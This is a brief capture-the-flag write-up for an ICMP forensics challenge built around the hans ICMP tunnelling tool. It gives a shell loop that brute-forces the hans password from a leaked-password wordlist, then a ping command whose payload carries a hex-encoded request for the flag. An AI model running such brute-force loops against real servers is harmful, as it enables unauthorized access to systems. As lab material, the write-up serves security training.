Tags: forensics icmp
Rating:
Realize the server is using hans
software for tunneling over ICMP. One can easily found that by googling "hans icmp".
How to find a password:
Option 1. Based on hans source code, crack the password. See the last lines of solution.py
Option 2. Brute-force:
for PASSWORD in $(<xato-net-10-million-passwords-100.txt); do echo "### $PASSWORD" ; sudo ../src/bin/hans -p "$PASSWORD" -c "$SERVER_IP" -f -v ; done
./hans -p "$PASSWORD" -c "$SERVER_IP" -f -v
>>> s='pleasegivemeflag'
>>> print(''.join([hex(ord(c)).replace('0x','') for c in s]))
706c65617365676976656d65666c6167
ping 192.168.18.1 -p 706c65617365676976656d65666c6167